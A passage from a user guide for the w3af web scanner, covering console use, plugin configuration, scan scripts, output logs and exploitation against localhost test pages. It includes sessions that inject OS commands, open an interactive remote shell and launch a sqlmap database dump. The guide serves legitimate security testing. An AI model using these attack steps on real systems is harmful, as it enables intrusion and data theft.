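        fuzzable.add((target, method.upper(), tuple(re.findall(r'<input name="([^"]+)"', inner))))
    return urls, fuzzable


def robots_txt(url):
    """Discovery plugin B: reads robots.txt for the URL's host and reports Disallow entries
    as URLs. The spider then crawls them, which is the plugin-to-plugin loop in action."""
    parts = urlsplit(url)
    robots_url = f"{parts.scheme}://{parts.netloc}/robots.txt"
    body = fetch(robots_url)
    if body is None:
        return set(), set()
    urls = {robots_url}
    for path in re.findall(r"^Disallow:\s*(\S+)", body, re.M):
        urls.add(urljoin(robots_url, path))
    return urls, set()


def run_discovery(start_url, plugins):
    """Work-queue loop: every URL found by any plugin is handed to every plugin,
    and the phase ends only when the queue drains with nothing new to add."""
    queue, known_urls, fuzzable = deque([start_url]), {start_url}, set()
    while queue:
        url = queue.popleft()
        fuzzable.add((url, "GET", ()))        # each URL is itself a GET injection point
        for plugin in plugins:
            new_urls, new_fuzzable = plugin(url)
            fuzzable |= new_fuzzable
            for found in new_urls - known_urls:
                known_urls.add(found)
                queue.append(found)
    return sorted(known_urls), sorted(fuzzable)


if __name__ == "__main__":
    urls, requests = run_discovery("http://localhost/w3af/", [web_spider, robots_txt])
    print(f"Found {len(urls)} URLs and {len(requests)} different points of injection.")
    for url, method, params in requests:
        line = f"{url} | Method: {method}"
        print(line + (f" | Parameters: ({','.join(params)})" if params else ""))
```

Running it with only the spider enabled never reaches the /w3af/hidden/ branch; enabling the robots.txt plugin as well lets the spider crawl what that plugin found, which is exactly the A-to-B-to-A hand-off described above.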

Running w3af

w3af has two user interfaces, the console user interface (consoleUI) and the graphical user interface (gtkUi). This user guide will focus on the consoleUI, which is, at the moment of this writing, much more tested and complete than the gtkUi. To fire up the consoleUI you just have to execute w3af without parameters and you will get a prompt like this one:

$ ./w3af_console
w3af>>>

From this prompt you will be able to configure the framework, launch scans and ultimately exploit a vulnerability. At this point you can start typing commands; the first command you have to learn is "help" (please note that commands are case sensitive):

w3af>>> help
|--------------------------------------------------------------|
| start        | Start the scan.                               |
| plugins      | Enable and configure plugins.                 |
| exploit      | Exploit the vulnerability.                    |
| profiles     | List and use scan profiles.                   |
|--------------------------------------------------------------|
| httpsettings | Configure the http settings of the framework. |
| miscsettings | Configure w3af misc settings.                 |
| target       | Configure the target URL.                     |
|--------------------------------------------------------------|
| back         | Go to the previous menu.                      |
| exit         | Exit w3af.                                    |
| assert       | Check assertion.                              |
|--------------------------------------------------------------|
| help         | Display help. issuing: help [command], prints |
|              | more specific help about "command"            |
| version      | Show w3af version information.                |
| keys         | Display key shortcuts.                        |
|--------------------------------------------------------------|
w3af>>>
w3af>>> help target
Configure the target URL.
w3af>>>

The main menu commands are explained in the help that is displayed above. The internals of every menu will be seen later in this document. As you already noticed, the "help" command can take a parameter, and if available, a detailed help for that parameter will be shown, e.g. "help keys". Other interesting things to notice about the consoleUI are the tab completion (type 'plu' and then TAB) and the command history (after typing some commands, navigate the history with the up and down arrows). To enter a configuration menu, you just have to type its name and hit enter; you will see how the prompt changes and you are now in that context:

w3af>>> httpsettings
w3af/config:httpsettings>>>

All the configuration menus provide the following commands:

● help
● view
● set
● back

Here is a usage example of these commands in the http-settings menu:

w3af/config:httpsettings>>> help
|-------------------------------------------------------|
| view   | List the available options and their values. |
| set    | Set a parameter value.                       |
|-------------------------------------------------------|
| back   | Go to the previous menu.                     |
| exit   | Exit w3af.                                   |
| assert | Check assertion.                             |
|-------------------------------------------------------|
w3af/config:httpsettings>>> view
|-------------------------------------------------------------------------------------------------|
| Setting           | Value | Description                                                         |
|-------------------------------------------------------------------------------------------------|
| timeout           | 10    | The timeout for connections to the HTTP server                      |
| headersFile       |       | Set the headers filename. This file has additional headers that are |
|                   |       | added to each request.                                              |
|-------------------------------------------------------------------------------------------------|
| ignoreSessCookies | False | Ignore session cookies                                              |
| cookieJarFile     |       | Set the cookiejar filename.                                         |
|-------------------------------------------------------------------------------------------------|
...
w3af/config:httpsettings>>> set timeout 5
w3af/config:httpsettings>>> view
...
| timeout           | 5     | The timeout for connections to the HTTP server                      |
...

To summarize, the "view" command is used to list all configurable parameters, with their values and a description. The "set" command is used to change a parameter's value. Finally, we can execute "back", "." or press CTRL+C to return to the previous menu. A detailed help for every configuration parameter can be obtained using "help parameter", as shown in this example:

w3af/config:httpsettings>>> help timeout
Help for parameter timeout:
===========================
Set low timeouts for LAN use and high timeouts for slow Internet connections.
w3af/config:httpsettings>>>

The "http-settings" and the "misc-settings" configuration menus are used to set system-wide parameters that are used by the framework. All the parameters have defaults and in most cases you can leave them as they are. w3af was designed in a way that allows beginners to run it without having to learn a lot of its internals, and is also flexible enough to be tuned by experts who know what they want and need to change internal configuration parameters to fulfil their tasks.

Running w3af with GTK user interface

The framework also has a graphical user interface that you can start by executing:

$ ./w3af_gui

The graphical user interface allows you to perform all the actions that the framework offers and features a much easier and faster way to start a scan and analyze the results. In case you are wondering what the graphical user interface looks like, here is a screenshot:

Plugins

Plugins do all the magic. The plugins will find the URLs, discover the vulnerabilities and exploit them. So now, we will learn how to configure the plugins. In a previous section I told you that w3af had three types of plugins: discovery, audit and exploit. Well, I actually lied a little bit, because w3af has other plugin types. The complete list of plugin types is:

● discovery
● audit
● grep
● exploit
● output
● mangle
● bruteforce
● evasion

As said before, discovery plugins find new points of injection, that are later used by audit plugins to find vulnerabilities. Grep plugins analyze all page content and find vulnerabilities on pages that are requested by other plugins; for example, a grep plugin will find a comment in the HTML body that has the word "password" inside it and generate a vulnerability based on it. Exploit plugins [ab]use the vulnerabilities found in the audit phase and return something useful to the user (remote shell, SQL table dump, a proxy, etc.). Output plugins are the way the framework and the plugins communicate with the user; output plugins save the data to a text or html file. Debugging information is also sent to the plugins and can be saved for analysis. Mangle plugins are a way to modify requests and responses based on regular expressions, think "sed (stream editor) for the web". Bruteforce plugins will bruteforce logins; they are actually part of the discovery phase. Finally, evasion plugins try to evade simple intrusion detection rules.

Plugin configuration

The plugins are configured using the "plugins" configuration menu. Let's see how to do that:

w3af>>> plugins
w3af/plugins>>> help
|------------------------------------------------------------|
| list       | List available plugins.                       |
|------------------------------------------------------------|
| back       | Go to the previous menu.                      |
| exit       | Exit w3af.                                    |
| assert     | Check assertion.                              |
|------------------------------------------------------------|
| mangle     | View, configure and enable mangle plugins     |
| evasion    | View, configure and enable evasion plugins    |
| discovery  | View, configure and enable discovery plugins  |
| grep       | View, configure and enable grep plugins       |
| bruteforce | View, configure and enable bruteforce plugins |
| audit      | View, configure and enable audit plugins      |
| output     | View, configure and enable output plugins     |
|------------------------------------------------------------|
w3af/plugins>>>

As you may have noticed, all plugins can be configured here except the exploit plugins; we will talk about them later. The first step to take here is to know the syntax for configuring the plugins, so let's do that:

w3af/plugins>>> help audit

View, configure and enable audit plugins
Syntax: audit [config plugin | plugin1[,plugin2 ... pluginN] | desc plugin]
Example: audit
Result: All enabled audit plugins are listed.
Example2: audit LDAPi,blindSqli
Result: LDAPi and blindSqli are configured to run
Example3: audit config LDAPi
Result: Enters to the plugin configuration menu.
Example4: audit all,!blindSqli
Result: All audit plugins are configured to run except blindSqli.
Example1: audit desc LDAPi
Result: You will get the plugin description
w3af/plugins>>> help list
List available plugins.
Syntax: list {plugin type} [all | enabled | disabled]
By default all plugins are listed.
w3af/plugins>>>

Ok, so w3af is nice enough to tell us how to use it. Now we will see how to get a list of the available plugins and their status:

w3af/plugins>>> list audit
|----------------------------------------------------------------|
| Plugin name  | Status | Conf | Description                     |
|----------------------------------------------------------------|
| LDAPi        |        |      | Find LDAP injection bugs.       |
| blindSqli    |        | Yes  | Find blind SQL injection        |
|              |        |      | vulnerabilities.                |
| buffOverflow |        |      | Find buffer overflow            |
|              |        |      | vulnerabilities.                |
| dav          |        |      | Tries to upload a file using    |
|              |        |      | HTTP PUT method.                |
| eval         |        |      | Finds incorrect usage of the    |
|              |        |      | eval().                         |
...

To enable the xss and sqli plugins, and then verify that the command was understood by the framework, we issue this set of commands:

w3af/plugins>>> audit xss, sqli
w3af/plugins>>> audit
|-----------------------------------------------------------------|
| Plugin name  | Status  | Conf | Description                     |
|-----------------------------------------------------------------|
...
| sqli         | Enabled |      | Find SQL injection bugs.        |
...
| xss          | Enabled | Yes  | Find cross site scripting       |
|              |         |      | vulnerabilities.                |
| xst          |         |      | Verify Cross Site Tracing       |
|              |         |      | vulnerabilities.                |
|-----------------------------------------------------------------|
w3af/plugins>>>

Or if the user is interested in knowing exactly what a plugin does, he can also run the "desc" command like this:

w3af>>> plugins
w3af/plugins>>> audit desc fileUpload
This plugin will try to expoit insecure file upload forms.

One configurable parameter exists:
    - extensions

The extensions parameter is a comma separated list of extensions that this plugin will try to upload. Many web applications verify the extension of the file being uploaded, if special extensions are required, they can be added here.

Some web applications check the contents of the files being uploaded to see if they are really what their extension is telling. To bypass this check, this plugin uses file templates located at "plugins/audit/fileUpload/", this templates are valid files for each extension that have a section ( the comment field in a gif file for example ) that can be replaced by scripting code ( PHP, ASP, etc ).

After uploading the file, this plugin will try to find it on common directories like "upload" and "files" on every know directory. If the file is found, a vulnerability exists.
w3af/plugins>>>

Now we know what this plugin does, but let's check their internals:

w3af/plugins>>> audit config xss
w3af/plugins/audit/config:xss>>> view
|--------------------------------------------------------------------|
| Setting        | Value | Description                               |
|--------------------------------------------------------------------|
| numberOfChecks | 3     | Set the amount of checks to perform for   |
|                |       | each fuzzable parameter. Valid numbers:   |
|                |       | 1 to 13                                   |
| checkStored    | True  | Search persistent XSS                     |
|--------------------------------------------------------------------|
w3af/plugin/xss>>> set checkStored False
w3af/plugin/xss>>> back
w3af/plugins>>> audit config sqli
w3af/plugins/audit/config:sqli>>> view
|-----------------------------------|
| Setting | Value | Description     |
|-----------------------------------|
|-----------------------------------|
w3af/plugins/audit/config:sqli>>>
w3af/plugins/audit/config:sqli>>> back
w3af/plugins>>>

The configuration menus for the plugins also have the set command for changing the parameters values, and the view command for listing existing values. On the previous example we disabled persistent cross site scripting checks in the xss plugin, and listed the options of the sqli plugin (it actually has no configurable parameters).

Starting a scan

After configuring all desired plugins, the user has to set the target URL and finally start the scan. The target selection is done this way:

w3af>>> target
w3af/config:target>>> set target http://localhost/
w3af/config:target>>> back
w3af>>>

Finally, you execute "start" in order to run all the configured plugins.

w3af>>> start

At any time during the scan, you may hit "enter" in order to get a live status of the w3af core. Status lines look like this:

Status: Running discovery.webSpider on http://localhost/w3af/ | Method: GET.

A complete session

A complete w3af session would look like this (see the inline comments):

$ ./w3af
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>> set verbose False
w3af/plugins/output/config:console>>> back

All these previous commands have enabled two output plugins, console and textFile, and configured them as needed.

w3af/plugins>>> discovery allowedMethods,webSpider
w3af/plugins>>> back

In this case, we will be running only discovery plugins. The enabled plugins are allowedMethods and webSpider.

w3af>>> target
w3af/target>>> set target http://localhost/w3af/
w3af/target>>> back
w3af>>> start

New URL found by discovery: http://localhost/w3af/responseSplitting/responseSplitting.php
New URL found by discovery: http://localhost/w3af/blindSqli/blindSqli-str.php
New URL found by discovery: http://localhost/w3af/webSpider/2.html
......
The URL: http://localhost/beef/hook/ has DAV methods enabled: OPTIONS GET HEAD POST TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK DELETE ( is possibly enabled too, not tested for safety )
New URL found by discovery: http://localhost/w3af/globalRedirect/wargame/
New URL found by discovery: http://localhost/w3af/globalRedirect/w3afsite.tgz

After the discovery phase is finished a summary is presented to the user:

The list of found URLs is:
- http://localhost/w3af/globalRedirect/w3af.testsite.tgz
- http://localhost/beef/hook/beefmagic.js.php
- http://localhost/w3af/globalRedirect/2.php
- http://localhost/w3af/webSpider/11.html
...

A section of the summary is the points of injection that will be used in the audit phase:

Found 78 URLs and 102 different points of injection.
The list of Fuzzable requests is:
- http://localhost/w3af/ | Method: GET
- http://localhost/w3af/responseSplitting/responseSplitting.php | Method: GET | Parameters: (header)
- http://localhost/w3af/sqli/dataReceptor.php | Method: POST | Parameters: (user,firstname)

Finally the user exits the application, returning to the shell.

w3af>>> exit
w3af, better than the regular script kiddie.
$

A warning about discovery

The discovery phase is a double-edged sword: use it with wisdom, and it will give you a lot of knowledge about the remote web application; use it in a greedy way and you will be waiting for hours until the discovery phase ends. Just to make things clear, the greedy way is to enable all discovery plugins (“discovery all”) without even knowing what you are doing or having manually browsed the web application and understood its internals. Some examples will make things clear:

● “You are testing an intranet web application, the web application is huge and doesn't use any macromedia flash or javascript code”. Recommendation: “discovery all,!spiderMan, !fingerGoogle, !fingerMSN, !fingerPKS, !MSNSpider, !googleSpider, !phishtank, !googleSafeBrowsing”. Reason: spiderMan should only be used when webSpider can't find all links. The fingerGoogle, fingerMSN and fingerPKS plugins discover mail addresses from search engines; if this is an intranet application, the addresses put in this site won't be available in search engines because they never were indexed. MSNSpider and googleSpider find URLs using search engines; like the ones before, they are useless because search engines don't index private pages. phishtank and googleSafeBrowsing should be disabled because they search for phishing sites, and like the ones before them, private sites aren't indexed in these systems.

● “You are testing a web application over the internet, the web application is huge and doesn't use any macromedia flash or javascript code”. Recommendation: “discovery all,!spiderMan, !wordnet, !googleSets”. Reason: spiderMan should only be used when webSpider can't find all links. The wordnet and googleSets plugins take a long time to run over the internet, so it's a good idea to disable them.

● “You are testing a web application over the internet, the web application is huge and has macromedia flash or javascript code. You also know that the application doesn't implement any web services”. Recommendation: “discovery all, !wordnet, !googleSets, !wsdlFinder”. Reason: The wordnet and googleSets plugins take a long time to run over the internet, so it's a good idea to disable them. Regarding wsdlFinder, if we already know that no web services exist, why look for them?

● “You are testing a web application over the internet, the web application is huge, you really need to know all the links and functionality of the site and you don't care about waiting”. Recommendation: “discovery all”. Reason: You really need to get a lot of knowledge about the site and don't care if it takes a complete day.
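The recommendations above are typed as plugin selection strings with “all” and “!name” exclusions. The following added example (not w3af's own code) resolves such a string into the concrete set of plugins that would run, so an exclusion list can be checked for typos before a long discovery phase is started; the plugin catalogue is constructed from the plugin names used on this page, and the behaviour for unknown names is this example's choice, not w3af's.

```python
# Added example (not w3af's own code): resolve a w3af-style plugin selection string
# into the set of plugins that would actually run. The catalogue below is constructed
# from the plugin names that appear on this page; a real installation lists the real
# names with the "discovery", "audit" and "output" commands in the w3af/plugins menu.

CATALOGUE = {
    "discovery": {
        "webSpider", "spiderMan", "allowedMethods", "fingerGoogle", "fingerMSN",
        "fingerPKS", "MSNSpider", "googleSpider", "phishtank", "googleSafeBrowsing",
        "wordnet", "googleSets", "wsdlFinder",
    },
    "audit": {"xss", "sqli", "osCommanding", "fileUpload"},
    "output": {"console", "textFile", "htmlFile", "gtkOutput", "webOutput"},
}


def resolve_selection(selection, available):
    """Return the set of plugins enabled by a selection such as "all,!spiderMan".

    Tokens are comma separated and processed left to right: "all" selects every
    plugin in `available`, a bare name adds that plugin and "!name" removes it.
    Whitespace around tokens (the recommendations above contain some) is ignored.
    Unknown names raise ValueError (this example's choice) so that a typo in an
    exclusion is reported instead of silently leaving a slow plugin enabled.
    """
    enabled = set()
    for raw in selection.split(","):
        token = raw.strip()
        if not token:
            continue
        if token == "all":
            enabled |= set(available)
            continue
        negate = token.startswith("!")
        name = token[1:].strip() if negate else token
        if name not in available:
            raise ValueError("unknown plugin: %r" % name)
        if negate:
            enabled.discard(name)
        else:
            enabled.add(name)
    return enabled


def parse_plugin_command(command, catalogue=CATALOGUE):
    """Parse a console line like "discovery all,!spiderMan" into (type, enabled set)."""
    ptype, _, selection = command.strip().partition(" ")
    if ptype not in catalogue:
        raise ValueError("unknown plugin type: %r" % ptype)
    return ptype, resolve_selection(selection, catalogue[ptype])


def excluded_plugins(command, catalogue=CATALOGUE):
    """Plugins of the command's type that will NOT run: a pre-scan checklist."""
    ptype, enabled = parse_plugin_command(command, catalogue)
    return sorted(catalogue[ptype] - enabled)
```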

When everything else fails...

So, you enabled only the recommended plugins in the discovery phase, you started the framework one hour ago, the discovery is still running and doesn't find anything. When you find yourself in this situation you have two options: waiting for w3af to finish, or hitting CTRL+C to finish the discovery and start with the audit phase. You should also remember that if you are saving the debug information to a text file you can open a new terminal and run “tail -f w3af-output-file.txt” to see what w3af is really doing.

w3af scripts

While developing w3af, I realized that I needed a fast way to execute the same steps over and over, so the script functionality was born. w3af can run a script file using the “-s” argument. Script files are text files with one command on each line. An example script file would look like this:

$ head scripts/script-osCommanding.w3af
# This is the osCommanding demo:
plugins
output console,textFile
output
output config textFile
set fileName output-w3af.txt
set verbose True
back

To run this script you would execute “./w3af_console -s scripts/script-osCommanding.w3af”; the output would look just as if you had typed every command by hand in the console:

$ ./w3af_console -s scripts/script-osCommanding.w3af
w3af>>>plugins
w3af/plugins>>>output console,textFile
w3af/plugins>>>output
|-------------|---------|------|-----------------------------------------|
| Plugin name | Status  | Conf | Description                             |
|-------------|---------|------|-----------------------------------------|
| console     | Enabled | Yes  | Print messages to the console.          |
| gtkOutput   |         |      | Saves messages to                       |
|             |         |      | kb.kb.getData('gtkOutput', 'queue'),    |
|             |         |      | messages are saved in the form of       |
|             |         |      | objects.                                |
| htmlFile    |         | Yes  | Print all messages to a HTML file.      |
| textFile    | Enabled | Yes  | Prints all messages to a text file.     |
| webOutput   |         |      | Print all messages to the web user      |
|             |         |      | interface this plugin and the web user  |
|             |         |      | interface are DEPRECATED.               |
|-------------|---------|------|-----------------------------------------|

w3af/plugins>>>output config textFile
w3af/plugins/output/config:textFile>>>set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>>set verbose True
w3af/plugins/output/config:textFile>>>back
w3af/plugins>>>output config console
w3af/plugins/output/config:console>>>set verbose False
w3af/plugins/output/config:console>>>back
w3af/plugins>>>back
w3af>>>plugins
w3af/plugins>>>audit osCommanding
w3af/plugins>>>back
w3af>>>target
w3af/config:target>>>set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/config:target>>>back
w3af>>>start

Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command)
Starting osCommanding plugin execution.
OS Commanding was found at: "http://localhost/w3af/osCommanding/vulnerable.php", using HTTP method GET. The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.
Finished scanning process.
w3af>>>exploit
w3af/exploit>>>exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited.
This is a list of available shells:
[ 0]
Please use the interact command to interact with the shell objects.
w3af/exploit>>>interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell0>>> ls
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell0>>> endInteraction
w3af/exploit>>>back
w3af>>>exit
spawned a remote shell today?
$

The Output

All the output of w3af is managed by the output plugins. Each output plugin writes in a different format (txt, html, etc); for example, the textFile plugin writes all output to the output-w3af.txt file by default. The configuration of these plugins is done just like for other plugins, as seen before:

$ ./w3af_console
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output config textFile
w3af/plugins/output/config:textFile>>> set fileName output-w3af.txt
w3af/plugins/output/config:textFile>>> set verbose True
w3af/plugins/output/config:textFile>>> back
w3af/plugins>>> output config console
w3af/plugins/output/config:console>>> set verbose False
w3af/plugins/output/config:console>>> back

This will configure the textFile plugin to output all messages, including the debugging information (see “set verbose True”), to the “output-w3af.txt” file. Here is an example of what is written to this file:

[ Sun Sep 14 17:36:09 2008 debug w3afCore ] Exiting setOutputPlugins()
[ Sun Sep 14 17:36:09 2008 debug w3afCore ] Called w3afCore.start()
[ Sun Sep 14 17:36:09 2008 debug xUrllib ] Called buildOpeners
[ Sun Sep 14 17:36:09 2008 debug keepalive ] keepalive: The connection manager has 0 active connections.
[ Sun Sep 14 17:36:09 2008 debug keepalive ] keepalive: added one connection, len(self._hostmap["localhost"]): 1
[ Sun Sep 14 17:36:09 2008 debug httplib ] DNS response from DNS server for domain: localhost
[ Sun Sep 14 17:36:09 2008 debug xUrllib ] GET http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 returned HTTP code "200"

Output plugins also handle the logging of HTTP requests and responses; every plugin handles this data in a different way. For example, the textFile plugin writes requests and responses to a file, while the htmlFile plugin disregards the data and simply does nothing with it. An example of a HTTP log written by the textFile plugin follows:

======Request 4 Sun Sep 14 17:36:12 2008======
GET http://localhost/w3af/osCommanding/vulnerable.php?command=+ping+-c+4+localhost HTTP/1.1
Host: localhost
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
======Response 4 Sun Sep 14 17:36:12 2008======
HTTP/1.1 200 OK
date: Sun, 14 Sep 2008 20:36:09 GMT
transfer-encoding: chunked
x-powered-by: PHP/5.2.4-2ubuntu5.3
content-type: text/html
server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch

PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.024 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.035 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.037 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.037 ms

--- localhost ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.024/0.033/0.037/0.006 ms
======

Just in case you are wondering, all messages sent by the plugins and the framework are sent to ALL enabled output plugins, so if you have enabled the textFile and htmlFile output plugins, both will log a vulnerability found by an audit plugin.
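A verbose textFile log quickly grows to thousands of lines, and the HTTP log is the part worth keeping as evidence of what the scanner actually sent. The following added example (not part of w3af) parses the two record types shown above, the “[ date level component ] message” lines and the “======Request N …======” / “======Response N …======” pairs, into structures that can be filtered and summarised; the sample log is constructed from the fragments on this page.

```python
# Added example (not w3af's own code): parser for the textFile output plugin format.
# Two record types are handled: framework messages "[ <date> <level> <component> ] <msg>"
# and the HTTP log, where "======Request N <date>======" and "======Response N <date>======"
# headers bracket the raw request/response and a bare "======" closes the pair.
# SAMPLE_LOG is constructed for this example from the fragments shown on this page.
import re
from collections import Counter

MSG_RE = re.compile(r"^\[ (\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) (\w+) (\S+) \] (.*)$")
HTTP_RE = re.compile(r"^======(Request|Response) (\d+) (.+?)======$")
SEP = "======"

SAMPLE_LOG = """\
[ Sun Sep 14 17:36:09 2008 debug w3afCore ] Called w3afCore.start()
[ Sun Sep 14 17:36:09 2008 debug xUrllib ] GET http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 returned HTTP code "200"
======Request 4 Sun Sep 14 17:36:12 2008======
GET http://localhost/w3af/osCommanding/vulnerable.php?command=+ping+-c+4+localhost HTTP/1.1
Host: localhost
User-agent: w3af.sourceforge.net
======Response 4 Sun Sep 14 17:36:12 2008======
HTTP/1.1 200 OK
content-type: text/html
server: Apache/2.2.8 (Ubuntu)

PING localhost (127.0.0.1) 56(84) bytes of data.
======
[ Sun Sep 14 17:36:12 2008 vulnerability osCommanding ] OS Commanding was found at: "http://localhost/w3af/osCommanding/vulnerable.php"
"""


def parse_http_block(lines):
    """Split raw HTTP text into (start line, lower-cased header dict, body)."""
    start = lines[0] if lines else ""
    headers, i = {}, 1
    while i < len(lines) and lines[i]:          # headers end at the first blank line
        name, _, value = lines[i].partition(":")
        headers[name.strip().lower()] = value.strip()
        i += 1
    return start, headers, "\n".join(lines[i + 1:])


def parse_textfile_log(text):
    """Return (messages, exchanges). messages: list of dicts for framework lines.
    exchanges: request id -> {"request": ..., "response": ...} (a side may be
    missing if the log was cut short, e.g. by CTRL+C)."""
    messages, exchanges = [], {}
    current = None  # [kind, id, timestamp, raw lines] while inside an HTTP record

    def close():
        if current is None:
            return
        kind, rid, ts, raw = current
        start, headers, body = parse_http_block(raw)
        rec = exchanges.setdefault(rid, {})
        if kind == "Request":
            method, _, rest = start.partition(" ")
            url = rest.rsplit(" ", 1)[0]         # drop the trailing "HTTP/1.x"
            rec["request"] = {"time": ts, "method": method, "url": url,
                              "headers": headers, "body": body}
        else:
            parts = start.split(" ", 2)           # "HTTP/1.1 200 OK"
            status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
            rec["response"] = {"time": ts, "status": status,
                               "headers": headers, "body": body}

    for line in text.splitlines():
        m = HTTP_RE.match(line)
        if m:
            close()
            current = [m.group(1), int(m.group(2)), m.group(3), []]
            continue
        if line == SEP:
            close()
            current = None
            continue
        if current is not None:
            current[3].append(line)
            continue
        m = MSG_RE.match(line)
        if m:
            messages.append({"time": m.group(1), "level": m.group(2),
                             "component": m.group(3), "text": m.group(4)})
    close()
    return messages, exchanges


def summarize(text):
    """Message counts per level plus one (id, method, url, status) tuple per request."""
    messages, exchanges = parse_textfile_log(text)
    by_level = Counter(m["level"] for m in messages)
    probes = [(rid, e["request"]["method"], e["request"]["url"],
               e.get("response", {}).get("status"))
              for rid, e in sorted(exchanges.items()) if "request" in e]
    return by_level, probes
```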

Complex sites

Some sites use embedded objects, like macromedia flash and java applets, that the browser renders to the user. Because of the inability of the framework to get any information out of those objects, a plugin called spiderMan was created. This plugin runs an HTTP proxy so the user can navigate the target site through it; during this process the plugin extracts information from the requests and responses. A simple example will clarify things: let's suppose that w3af is auditing a site and can't find any links on the main page. After a closer interpretation of the results by the user, it is clear that the main page has a java applet menu where all the other sections are linked. The user runs w3af once again and now activates the spiderMan plugin, and navigates the site manually using the browser and the spiderMan proxy. When the user has finished his browsing, w3af will continue with all the hard auditing work. The spiderMan plugin can be used when javascript, flash, java applets or any other browser side technology is present. This is a sample spiderMan plugin run:

w3af>>> plugins
w3af/plugins>>> discovery spiderMan
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://localhost/w3af/fileUpload/
w3af/target>>> back
w3af>>> start
spiderMan proxy is running on 127.0.0.1:44444 .
Please configure your browser to use these proxy settings and navigate the target site.
To exit spiderMan plugin please navigate to http://127.7.7.7/spiderMan?terminate .

Now the user configures the browser to use the 127.0.0.1:44444 proxy and navigates the target site; after that he navigates to “http://127.7.7.7/spiderMan?terminate” and exits the spiderMan. The results are shown:

New URL found by discovery: http://localhost/w3af/test
New URL found by discovery: http://localhost/favicon.ico
New URL found by discovery: http://localhost/w3af/
New URL found by discovery: http://localhost/w3af/img/w3af.png
New URL found by discovery: http://localhost/w3af/xssforms/testforms.html
New URL found by discovery: http://localhost/w3af/xssforms/dataReceptor.php
The list of found URLs is:
- http://localhost/w3af/fileUpload/
- http://localhost/w3af/test
- http://localhost/w3af/xssforms/dataReceptor.php
- http://localhost/w3af/
- http://localhost/w3af/img/w3af.png
- http://localhost/w3af/xssforms/testforms.html
- http://localhost/w3af/fileUpload/uploader.php
- http://localhost/favicon.ico
Found 8 URLs and 8 different points of injection.
The list of Fuzzable requests is:
- http://localhost/w3af/fileUpload/ | Method: GET
- http://localhost/w3af/fileUpload/uploader.php | Method: POST | Parameters: (MAX_FILE_SIZE,uploadedfile)
- http://localhost/w3af/test | Method: GET
- http://localhost/favicon.ico | Method: GET
- http://localhost/w3af/ | Method: GET
- http://localhost/w3af/img/w3af.png | Method: GET
- http://localhost/w3af/xssforms/testforms.html | Method: GET
- http://localhost/w3af/xssforms/dataReceptor.php | Method: POST | Parameters: (user,firstname)
Starting sqli plugin execution.
w3af>>>

Exploiting

Two ways of exploiting a vulnerability exist: the first one uses the vulnerabilities found by the audit phase, and the second one, which is called fastexploit, requires the user to enter the vulnerability parameters.

Let's see an example of the first way of exploiting a vulnerability with w3af:

w3af>>>plugins
w3af/plugins>>>audit osCommanding
w3af/plugins>>>back
w3af>>>target
w3af/config:target>>>set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/config:target>>>back
w3af>>>start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command)
Starting osCommanding plugin execution.
OS Commanding was found at: "http://localhost/w3af/osCommanding/vulnerable.php", using HTTP method GET. The sent data was: "command=+ping+-c+9+localhost". The vulnerability was found in the request with id 5.
Finished scanning process.
w3af>>>exploit
w3af/exploit>>>exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited.
This is a list of available shells:
[ 0]
Please use the interact command to interact with the shell objects.
w3af/exploit>>>interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell0>>> ls
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell0>>> endInteraction
w3af/exploit>>>back
w3af>>>

The second way is to use fastexploit. This method should be used when the user has found a vulnerability manually and wants to exploit it using the framework. Here is an example of a fastexploit run:

w3af>>> exploit
w3af/exploit>>> exploit config sqlmap
w3af/plugin/sqlmap>>> set url http://localhost/w3af/blindSqli/blindSqli-integer.php
w3af/plugin/sqlmap>>> set injvar id
w3af/plugin/sqlmap>>> set data id=1
w3af/plugin/sqlmap>>> back
w3af/exploit>>> fastexploit sqlmap
sqlmap coded by inquis and belch
SQL injection could be verified, trying to create the DB driver.
Execute "exitPlugin" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/sqlmap>>> dump agenda w3af_test
Database: w3af_test
